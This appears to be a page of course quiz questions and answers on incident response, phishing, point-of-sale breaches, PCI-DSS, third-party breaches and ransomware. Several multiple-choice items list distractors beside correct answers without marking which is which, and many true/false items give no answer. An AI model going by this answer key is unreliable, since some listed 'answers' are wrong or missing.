According to the IRIS framework, during the third phase of an attack when the attackers are attempting to escalate privileges, what should the IR team be doing as a countermeasure?
Analyze all network traffic and endpoints, searching for anomalous behavior
According to the IRIS framework, during the fifth phase of an attack, the attackers will attempt execute their final objective. What should the IR team be doing as a countermeasure?
Thoroughly examine available forensics to understand attack details, establish mitigation priorities, provide data to law enforcement, and plan risk reduction strategies
True or False. A data breach only has to be reported to law enforcement if external customer data was compromised?
In creating an incident response capability in your organization, NIST recommends taking 6 actions. Which three (3) actions that are a included on that list?
Considering the relevant factors when selecting an incident response team model
Establish policies and procedures regarding incident-related information sharing
Secure executive sponsorship for the incident response plan
Develop incident response procedures
Which incident response team model would best fit the needs of a the field offices of a large distributed organizations?
Hybrid incident response team
Distributed incident response team
Central incident response team
Coordinating incident response team
Which incident response team staffing model would be appropriate for a small retail store that has just launched an online selling platform and finds it is now under attack? The platform was put together by its very small IT department who has no experience in managing incident response.
Completely outsource the incident response work to an onsite contractor with expertise in monitoring and responding to incidents
Which three (3) technical skills are important to have in an organization's incident response team?
System administration
Encryption
Programming
Network administration
Identifying incident precursors and indicators is part of which phase of the incident response lifecycle?
Detection & Analysis
Automatically isolating a system from the network when malware is detected on that system is part of which phase of the incident response lifecycle?
Containment, Eradication & Recovery
According to the IRIS Framework, during which stage of an attack would the attacker send phishing email, steal credentials and establish a foothold in the target network?
Launch and execute the attack
According to the IRIS Framework, during which stage of an attack would the attacker execute their final objectives?
Attack objective execution
According to the IRIS framework, during the first stage of an attack, when the bad actors are conducting external reconnaissance and aligning their tactics, techniques and procedures, what should the IR team be doing as a countermeasure?
Build a threat profile of adversarial actors who are likely to target the company
According to the IRIS framework, during the fourth phase of an attack, the attackers will attempt to evade detection. What should the IR team be doing as a countermeasure?
Analyze all network traffic and endpoints, searching for anomalous behavior
True or False. A data breach always has to be reported to law enforcement agencies.
Phishing Scams
Some of the earliest known phishing attacks were carried out against which company?
America Online (AOL)
You have banked at "MyBank" for many years when you receive an urgent email telling you to log in to verify your security credentials or your account would be frozen. You are not wealthy but what little you have managed to save is in this bank. The email is addressed to "Dear Customer" and upon closer inspection you see it was sent from "security@mybank.yahoo.com". What kind of attack are you under?
As a phishing attack.
True or False. HTTPS assures passwords and other data that is sent across the Internet is encrypted. Links in email that use HTTPS will protect you against phishing attacks.
Which three (3) of these statistics about phishing attacks are real? (Select 3)
The average cost of a data breach is $3.86 million.
15% of people successfully phished will be targeted at least one more time within a year.
Phishing accounts for 90% of data breaches.
12% of businesses reported being the victim of a phishing attack in 2018.
Which range best represents the number of unique phishing web sites reported to the Anti-Phishing Working Group (apwg.org) in Q4 2019?
Between 130,000 and 140,000.
Which is the most common type of identity theft?
Credit card fraud
Point of Sale Breach
True or False. There are more successful PoS attacks made against large online retailers than there are against small to medium sized brick-and-mortar businesses.
Which is the standard regulating credit card transactions and processing?
PCI-DSS
Which three (3) of these are PCI-DSS requirements for any company handling, processing or transmitting credit card data?
Do not use vendor-supplied defaults for system passwords and other security parameters
Protect stored cardholder data
Install and maintain a firewall configuration to protect cardholder data
Cardholder data may not reside on local PoS devices for more than 48 hours
True or False. A study conducted by the Ingenico Group found that credit card transactions were sufficiently secure as long as all participants were in strict compliance with PCI-DSS standards.
What are the two (2) most common operating systems for PoS devices?
Windows and Linux
If your credit card is stolen from a PoS system, what is the first thing the thief is likely to do with your card data?
Sell it to a distributor
Sell to a broker who will then sell in bulk to "carders" who then purchase pre-paid credit cards which are then used to buy gift cards which are then used to buy goods which are then sold for profit after being shipped to a re-shipper
PCI-DSS can best be described how?
A voluntary payment card industry data security standard
Which group suffers from the most PoS attacks?
Restaurants and small retail stores.
Which three (3) of these control processes are included in the PCI-DSS standard?
Protect cardholder data
Build and maintain a secure network and systems
Require use of multi-factor authentication for new card holders
Maintain a vulnerability management program
Which three (3) of these are PCI-DSS requirements for any company handling, processing or transmitting credit card data?
Encrypt transmission of cardholder data across open, public networks
Use and regularly update antivirus software
All employees with direct access to cardholder data must be bonded
Develop and maintain secure systems and applications
When is credit card data most vulnerable to PoS malware?
While in RAM
Which scenario best describes how a stolen credit card number is used to enrich the thief?
Stolen credit card numbers are sold to brokers who resell them to carders who use them to buy prepaid credit cards that are then used to buy gift cards that will be used to buy merchandise for resale
Which three (3) of these were cited as the top 3 sources of third-party breach?
3rd Party Breach
A cyber attack originating from which three (3) of the following would be considered a supply-chain attack?
E-mail providers
Subcontractors
Web hosting companies
Which three (3) of these were cited as the top 3 sources of third-party breach?
Cloud-based storage or hosting providers
Online payment or credit card processing services
JavaScript on websites used for web analytics
True or False. While data loss from a third-party breach can be expensive, third-party breaches account for less than 22% of all breaches.
According to a 2019 Ponemon study, what percent of consumers say they will defect from a business if their personal information is compromised in a breach?
80%
True or False. According to a 2018 Ponemon study, organizations surveyed cited "A third-party misused or shared confidential information..." as their top cyber security concern for the coming year.
How effective were the processes for vetting third-parties as reported by the majority (64%) of the companies surveyed?
Somewhat or not effective
In the first few months of 2020 data breaches were reported from Instagram, Carson City, Amazon, GE, T-Mobile, radio.com, MSU, and Marriot. While different data were stolen from each organization, which two data elements were stolen from all of them?
Personal information
Customer financial information
True or False. More than 63% of data breaches can be linked to a third-party.
According to a 2019 Ponemon study, which is the most common course of action for a consumer who has lost personal data in a breach?
Tell others of their experience
Ransomware
3 Main Types
Crypto: Specific files encrypted
Locker: Completely locks out device
Leakware/Doxware: e.g. footage from webcam
Attack Vectors
Phishing
RDP
Software Vulns
Malicious Links
What is the most important thing to have in place that will save you from having to pay a ransom in the event you have fallen victim to a ransomware attack?
A full system backup
Which ransomware spread across 150 countries in 2017 and was responsible for over $4 billion in losses worldwide?
WannaCry
True or False. Projections are that ransomware will not be a significant problem in the future as operating systems become more secure and anti-malware applications gain in sophistication.
True or False. It is feared that in the future our cars, homes and factories may fall victim to ransomware attacks as more and more devices join the Internet of Things.
Last updated
Was this helpful?
